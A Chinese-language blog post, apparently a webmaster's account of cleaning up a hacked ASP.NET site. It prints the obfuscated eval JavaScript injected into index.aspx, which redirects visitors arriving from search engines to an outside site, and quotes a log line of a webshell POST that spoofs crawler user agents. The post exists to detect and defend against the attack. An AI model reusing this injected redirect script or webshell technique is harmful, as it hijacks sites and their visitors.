网站被黑是一件很烦恼的事情,尤其快照劫持和转跳。对seo影响也算是非常的大!
百度中被劫持的快照:
我们先看下被劫持的HTML是如下:
我们再来看下程序:
index.aspx
已经被修改:
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("<5 c=\\"b\\">");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\\"g\\")>0 ||1.2(\\"n\\")>0 ||1.2(\\"o\\")>0 )");3.4("i.h=\\"k://j.l.p:m\\";");3.4("</5>");',26,26,'|s|indexOf|document|writeln|script|sogou|baidu|soso|uc|sm|Javascript|LANGUAGE|var|if|referrer|bing|href|location|www|https|28228|9999|yahoo|so|cc'.split('|'),0,{}))</script>日志分析工具:
http://tool.apizl.com/tools-spiderlogs-baiduspiderlogs.html
我们直接下载最近20天日志进行分析,因为一句话木马需要post来操作进行修改:
然后分析到后台有个这样请求:
2018-05-21 08:45:30 bgw-016 112.125.178.92 POST /Manager/201805201611506528636.aspx - - 139.196.8.212 HTTP/1.1 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)+Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) http://www.weishengjiangeduan.com www.weishengjiangeduan.com 200 408 328
而且是模仿谷歌和百度的这样肯定就不正常了。!
我们只需要分析日志中所有异常请求,打开文件查看是否为正常系统文件!
打开这个文件/Manager/201805201611506528636.aspx,又是一句话木马:
当然这个小马不止一个了,需要打开网站所有目录进行检查。
然后我们清理掉那些小马基本上能解决被黑劫持问题,当然这个只是解决问题。。。但是没有解决根本!
我们需要分析这些小马是怎么来的,首先这些小马都是2018-4-20来创建的。首先查看4月20号做了什么事情。
然后加强目录的权限控制和各个密码的强度。使用密码生成器:http://tool.apizl.com/tools/createPassword.html
只有日常加强防护才能防止被黑!
关键字词:
